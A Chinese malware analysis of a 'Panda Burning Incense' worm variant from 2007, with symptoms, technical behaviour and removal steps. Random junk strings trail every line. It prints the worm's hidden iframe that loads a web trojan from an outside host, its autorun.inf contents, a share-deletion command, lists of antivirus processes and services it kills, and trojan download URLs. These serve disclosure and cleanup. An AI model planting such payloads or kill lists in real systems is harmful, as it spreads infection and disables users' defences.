熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe 0'T*l2Z`2  
0?hJ!IT;q7  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） Ml`tDt|;  
C{mL]ds<  
中文名称：（尼姆亚，熊猫烧香） HAa
2q=  
_&!%yW@  
病毒大小：68,570 字节 6[g~p< 8n}  
6% 
+s`  
编写语言：Borland Delphi 6.0 - 7.0 ts BPQ 8Ne  
\LX
!n!@  
加壳方式：FSG 2.0 -> bart/xt N|cWTbi  
^B[%|{cO  
发现时间：2007.1.16 qI-q%]l  
 X$:r  
危害等级：高 kkfwICBI  
Z|&Y1k-h  
一、病毒描述： /">A3bq  
n{oRmw-
 
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 '\yp}r'u  
|BrD:+  
二：中毒现象： e_3KNQ`kA  
r?Y+TtF\e  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 NPjh2 AJm  
!FwR7`i  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 iwb]mJUA  
@Y2"=QVt  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16
>XzP'h  
B{IYVviiP  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> 1o5DQ'~n  
CS[[TzC=5  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 'M"JF;*r  
e~7h8?\.q  
6：不能正常使用任务管理器，SREng.exe等工具。 ofeSGx  
BzFD_A>j;_  
7：无故的向外发包，连接局域网中其他机器。 YDEUiZ~  
jn+NX)9  
三：技术分析 }T!2IaAB  
z:PH _N~  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe /+pPcK  
1
S!<D)n  
建立注册表自启动项: zPwU'TbF  
W`zY\]  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] I{Pny/d`  
_H#l&bL@C  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" JI1O(  
5fGUJ[F=  
2：查找反病毒窗体病毒结束相关进程: p)M\q fZ  
{4\hxyw  
天网防火墙 ]s lYr8m  
D8+68_BEM  
virusscan @&f3zq  
S30@|@fTz  
symantec antivirus k^A Yg!~  
p_hljgOV  
system safety monitor [oOA@  
%y
zFWDg  
system repair engineer 1
c=Roiq  
I0\}S [+H  
wrapped gift killer 'TPRGX~&  
j[
/'`1tOe  
游戏木马检测大师 Q>gU(  
{Kp<T  
超级巡警 )r O`K  
&dSw[C#f  
3：结束以下进程: A@/DGrZX  
Is6<3eQ\x  
mcshield.exe +~ro*{3  
b@J&jE~d  
vstskmgr.exe l'~]8Wo1  
)Qve[O  
naprdmgr.exe \6B,\l]$t@  
qlUYu"`i  
updaterui.exe 5G8`zy  
[c?']<f4  
tbmon.exe 0D1yG(ck  
Xq&x<td  
scan32.exe t`{^gt  
F<q3{}1zR  
ravmond.exe fM]McZ9)D  
*VT@  
ccenter.exe 2tvMa%1^  
z`uqK!v(K  
ravtask.exe WNTm  
G)l[\6Dn  
rav.exe o"^}2^)_SR  
zx\N^R;Jq  
ravmon.exe |7Z,z0 ?V  
maLJ M\C  
ravmond.exe ZNPzQ:I@  
V"VWHAu*.w  
ravstub.exe 5=Bj?xb$'  
"fLGXbNQ  
kvxp.kxp -"5x? \.{m  
zTY|Z@:  
kvmonxp.kxp {xt<`_R  
XKp%
7;  
kvcenter.kxp A"Rzn1/  
I=hgfo  
kvsrvxp.exe ovCk:Vz  
a<Pi J?  
kregex.exe 7|6tH@4Ub  
uqZLlP#&#  
uihost.exe <W,k$|w  
!?tWWU%P)  
trojdie.kxp ?{qw /&  
k=Ef)'  
frogagent.exe G;Y,C<)0k  
L&ws[8-  
kvxp.kxp i`r,B`V`08  
;-=y}DK  
kvmonxp.kxp 5S7`gN.  
?9X#{p>q  
kvcenter.kxp xpyb&A  
%R;cXs4r  
kvsrvxp.exe <E@7CG.=  
LF%1)x  
kregex.exe |dD!@K  
oAWk<B(@  
uihost.exe aJMh>  
>^:g[6Sj  
trojdie.kxp o;Zoj}  
`#fOY$#XB  
frogagent.exe O( h
e  
mkBQX  
logo1_.exe Z;S*fS-_  
:G^`LyOM  
logo_1.exe Hh;w\)/%j  
[
&nwB!kt  
rundl132.exe g) v"nNS  
zwU8iVDe  
taskmgr.exe + y.IDn^  
PR|Trnd&D  
msconfig.exe 4Bx1L+Cg  
<
O5;w  
regedit.exe '0 (Bb  
S$+ v?Y`)  
sreng.exe `r*6P^P  
4：禁用下列服务: g#[9O'H  

7gVWu"  
schedule #]lUJ &M}e  
A ws#>l<  
sharedaccess ?qO,=ms>-  
'EZ[aY!);  
rsccenter 5.?O PK6  
CHeG{l)<r  
rsravmon LOnh
FX   
x(]s#D!)  
rsccenter 6S6nE%.3  
>.{ ..~"K  
kvwsc {Y/|7Cl0  
Ka_UVKwMro  
kvsrvxp _D,8`na>K  
J+IW  
kvwsc $#RD3#=?u  
do[K-r  
kvsrvxp >t D-kzN  
m/eGnv;!  
kavsvc !5B9:p~-  
2M&4]d  
avp x *qef_Hu  
b,Z&P|  
avp &us8,x6yg  
*0c }`|  
kavsvc E<\\'VF  
}qKeX4\-  
mcafeeframework Xx'>5
d>  
L/
/sJe  
mcshield Ap!UX=HBb  
w4x8 Sre  
mctaskmanager chd${ j  
pM46I"  
mcafeeframework VBH[aIW  
3Aj_,&X.@(  
mcshield /6q/`vx@  
.R gfP'M  
mctaskmanager ;! 9_5Ar%  
! 4o
Ix`  
navapsvc > T-O3/KN  
*z+\yfOO"  
wscsvc F}AbA pTv  
*$
cp"  
kpfwsvc gx6&'${=#  
jSVO$AW~C  
sndsrvc ^&6NB)6  
pc.0;gN  
ccproxy GDcV1$NA  
; zvnDox  
ccevtmgr w-#0k.T  
i&HV8&KygN  
ccsetmgr Rke:*(p*n;  
h7y*2:l6  
spbbcsvc _bd#C  
Z|/):nVP7  
symantec core lc f9Xw]G9  
rL s6MY  
npfmntor }fCM_w  
('lnQD.Hd  
mskservice xsTxc&0^  
UF%5/SiVX  
firesvc rx;U/)~#<  
3>(`Y  
5：删除下列注册表项: os.x|R]_  
9Ac t<(V  
software\microsoft\windows\currentversion\run\ravtask M[{Cy[ta  
# R&[+1=9j  
software\microsoft\windows\currentversion\run\kvmonxp (s3%1OC[  
}dHiW:J>  
software\microsoft\windows\currentversion\run\kav -Q@d  
kC k-  
software\microsoft\windows\currentversion\run\kavpersonal50 AFFLnLA<L  
E+)Go-rS(  
software\microsoft\windows\currentversion\run\mcafeeupdaterui oTfbx+i/G  
-Fdi,\e  
software\microsoft\windows\currentversion\run\network associates error reporting service BJE <~"  
:L[6a>"neE  
software\microsoft\windows\currentversion\run\shstatexe =z/F=1^<  
@j (jOe  
software\microsoft\windows\currentversion\run\ylive.exe 8`t%QhE2  

:acQK=fe  
software\microsoft\windows\currentversion\run\yassistse !kcg#+s91  
5oKc=iX_3  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） 0/6&2  
(=/F=,w   
7：跳过下列目录: C|I 1 m  
N93E;B  
windows Pc7:hu  
U %ESuq#  
winnt zoJ;5a.3B  
KR}0(,Y  
systemvolumeinformation 8Vn6* Xn  
}j?S?=;m=  
recycled *X\c $=*  
5);#\&B  
windowsnt %p9bl ,x  
;SW-dfo2i  
windowsupdate 8j'*IRj*q  
F^YIZ,=p!  
windowsmediaplayer 8w&rj-  
FJLJ;]`7+  
outlookexpress PNKT\yd  
iy]}1((hR  
netmeeting ;}~=W!yz  
"Y!
dn|3  
commonfiles $vBU}~l7  
Nd_@J&  
complusapplications BFOFes`>~  
6p"c^  
commonfiles o"FiM5L^.  
mx9/K+:  
messenger *d@Hnu"q  
F}]_/cY7B  
installshieldinstallationinformation `t1$Ew
<  
pxxFm~"d  
msn L"iyjL<M  
ql~{`qoD~  
microsoftfrontpage QYgN39gp  
_vdxxhJ=P3  
moviemaker Pm^N0L9?q  
i)L:VkN  
msngaminzone CFm1c1%Hg  
|{)xC=  
8：删除*.gho备份文件. 2<G1'7)  
X-1Vp_(,TP  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. Qc;[mxQe  
i
g}e@]  
autorun.inf内容： 6I.mc  
A{I a21T7  
程序代码 aT!9W'uY  
ox_h9=$-  
[AutoRun] EQJ_$6
  
Kk>qgi$  
OPEN=setup.exe y,?G75wij  
g&3#22z  
shellexecute=setup.exe `Kw"XGT  
2A}uqaF  
shell\Auto\command=setup.exe c^Jgr(Ow  
+M##mRD  
10：删除共享：cmd.exe /c net share admin$ /del /y 
loUwRz  
p=+*g.,O  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 =O#AOw`  
d^5SeCs6  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。 2nU NI U  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 @xm~T|[7  
Ws*PMK.0  
目前下载列表如下： DRW.NL o  
1Bk*G>CX9(  
http://www.krvkr.com/down/cq.exe 5o| !f  
%?oU{KzQ@;  
http://www.krvkr.com/down/mh.exe @B'8SLoP  
G0QXf  
http://www.krvkr.com/down/my.exe tnF9Vj[#%_  
L%K_.!d^  
http://www.krvkr.com/down/wl.exe tOM3Gs~o6z  
cL)rjty2  
http://www.krvkr.com/down/rx.exe =x0"6gTz>  
KTK6#[8A  
http://www.krvkr.com/down/wow.exe V2s}<uG  
sRyw\v-=P  
http://www.krvkr.com/down/zt.exe o`K^Wy~+k#  
UW/3{2  
http://www.krvkr.com/down/wm.exe Sd\
IGy{a  
@yn^6cE  
http://www.krvkr.com/down/dj.exe an=+6lIl  
`H2F0{\og  
http://www.krvkr.com/cn/iechajian.exe 2b4pOM7W  
bj7MzlGFy  
到此病毒行为分析完毕。 oA;jy  
R'9@A\7#  
四：Sec120.Com专家解决方案： ^[seK)S=  
c_G-R+  
1：关闭网络共享，断开网络。 v!#`W  
aC,vh1")F  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） cUZ!;*  
T]nR=uK6LL  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 RC8)f8n  
~f=6?5.wa  
4：删除注册表启动项 \buZ?  
q3x;_y^  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] StyB"1y  
fa4951_  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" CFBUQMl>  
8XYD L]I'  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe }+dM1O  
pKxX{i1l  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 *H%0Gsk  
w(V?N'[  
7：如果电脑上有脚本文件，将病毒代码全部删除。 V|3yZ8lE  
P )t]bS  
8：关闭系统的自动播放功能。 V<HOSB7  
v#:+n+y\z  
这样就基本上将病毒清除了